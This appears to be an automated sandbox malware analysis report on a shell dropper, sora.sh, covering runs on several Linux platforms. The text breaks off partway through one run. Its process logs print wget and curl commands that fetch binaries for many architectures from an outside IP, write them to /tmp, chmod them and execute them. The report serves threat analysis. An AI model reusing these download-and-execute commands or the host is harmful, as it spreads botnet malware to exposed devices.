Malware Analysis Report

2025-01-23 15:17

Sample ID 240822-1rgc2azdkg
Target sora.sh
SHA256 19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Tags
antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902

Threat Level: Shows suspicious behavior

The file sora.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-22 21:52

Signatures

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:30

Platform

debian9-mipsel-20240418-en

Max time kernel

265s

Max time network

266s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x robben sora.sh systemd-private-1cf8b6e8793e4fab844e6ddbaf438d0d-systemd-timedated.service-p3398a]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:30

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

111s

Max time network

481s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-timedated.service-Z3fTpE]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-timedated.service-Z3fTpE]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-timedated.service-Z3fTpE]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x config-err-rJ0QKx netplan_twhpd75w robben snap-private-tmp sora.sh ssh-uxNhGA2PLfAN systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-bolt.service-hlwbSJ systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-colord.service-HuJndO systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-ModemManager.service-rWWPAA systemd-private-4e2d4b91262348f29e0a494cd9e96eb3-systemd-resolved.service-bQR5mZ]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 151.101.193.91:443 tcp
GB 89.187.167.3:443 tcp
US 158.51.127.106:80 tcp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.98:80 connectivity-check.ubuntu.com tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.97:80 connectivity-check.ubuntu.com tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:31

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

96s

Max time network

479s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-timedated.service-JgaXah systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-timedated.service-JgaXah systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-timedated.service-JgaXah systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x config-err-dB4LVr robben snap-private-tmp sora.sh ssh-cHprY3eUxhzt systemd-private-b507eacb8b6541a68506720f7a938da9-colord.service-timBzf systemd-private-b507eacb8b6541a68506720f7a938da9-ModemManager.service-c6cUZe systemd-private-b507eacb8b6541a68506720f7a938da9-switcheroo-control.service-Ve6YFh systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-logind.service-JwETAg systemd-private-b507eacb8b6541a68506720f7a938da9-systemd-resolved.service-2B5wKg systemd-private-b507eacb8b6541a68506720f7a938da9-upower.service-GcSdch]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 91.189.91.48:80 connectivity-check.ubuntu.com tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.18:80 connectivity-check.ubuntu.com tcp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:20

Platform

debian12-armhf-20240221-en

Max time kernel

45s

Max time network

605s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x robben sora.sh systemd-private-daa11adc0ab5421ca292d0e62b829ff5-ntpsec.service-idxHt7 systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-logind.service-uH9Ulj systemd-private-daa11adc0ab5421ca292d0e62b829ff5-systemd-timedated.service-eZIIpN]

/tmp/robben

[./robben Payload]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

